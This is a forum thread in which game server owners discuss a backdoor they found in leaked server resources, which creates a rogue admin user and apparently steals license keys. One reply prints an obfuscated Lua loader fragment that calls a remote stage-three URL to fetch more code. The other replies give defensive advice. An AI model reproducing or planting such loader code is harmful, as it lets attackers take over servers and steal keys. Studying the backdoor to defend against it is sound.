I’ll check it out later when I have time. If you find a way to fix it, I’d really appreciate it.
yeah im watching the post i only know how it looks like and how it acts but im still trying to help you as best as i can
1 Like
We have removed all the folders of the scripts that we have and created a new server and for now no new line appears.
ok then your virus had completed all 4 stages was in your server itself
Is there a way to prevent it from happening again?
hi bro, can this fix the cipher panel virus? my server is infected, what can i do for that.
Hello, I have gotten a virus on my server too. It also created a new user named ‘Moda’ . I dont know what to do as I dont know where the virus came from. I also cant tell Escrow from a Cipher.
did you add something new recently ?
so can any one explain further on this?
since when can a server get infected?
A server can get infected for a very long time. common ciphers / backdoors look like this: (I have decrypted the code, a pretty nice part of it. but it would be obfuscated). Sometimes Luraph LUA obfuscator, etc etc.
FsCsYJWTUlikHlZDxTBFZQLbHMuimqEfYSwYwBnyUJlIgPXcFZgTViIxtZwcfxBJSfCvGU[4][FsCsYJWTUlikHlZDxTBFZQLbHMuimqEfYSwYwBnyUJlIgPXcFZgTViIxtZwcfxBJSfCvGU[1]](
"https://trigger.serververse.net/v2_/stage3.php?to=zXEA4H", -- Encoded URL
function(QRCjQbRkEciwsFKICgtfZkeIFzHNoNTHkQBdKUBLbsiMFDqWnkxIawbaVsbjePbjnxABUz, fTWxfqwdawxIumeDDlqFCaYCGgHMrGRRHnaDriZcigTcMkElutobhmkympaWENusQuQAPP)
-- Function body with check and return
end
)
Also, you can get an antivirus, however it likely will not stop this, unless the attacker is a total dumbass.
the server will usually warn you in your console about this, it will automatically delete the “fxmanifest.lua” essentially disabling the script.
If you dont want to get your server infected, one very simple rule of thumb to follow:
Do not download/run any resources from places or people you do not trust, especially all the different “leak forums” and mediums like that. As long as you conduct thorough checks on everything you download and run before actually running it, you will be just fine.
1 Like
Its called a backdoor. Someone entered a code inside a leaked file that you downloaded. If u start this resource, the backdoor automatically starts and infects other resources so you cant find it that easy. It creates an admin login to your root server and can steal everything from u. Change Password from everything. A good friend of mine had this before, he lost his keymaster worth 3k. So beware of this because its not a joke. Stop downloading and using leaked files from discords.
2FA is a good idea no matter what.
1 Like
No it will not.
2FA will not protect you from new “rules” created in the windows operating system.
Just learn how to analyse code and youll be fine. If you dont have a basic knowledge of what functions do what, then dont even think about having a server. that easy.
Dont be so rude, ofc 2fa. will prevent someone from overtaking your tebex. If you dont know such thing about security, then you should not advise anyone in that matter.
so from what i have gathered, this is just some obfuscated lua code, either on a client or server sided script, that runs code in the back?
so essentially, its just trying to steal your server license key’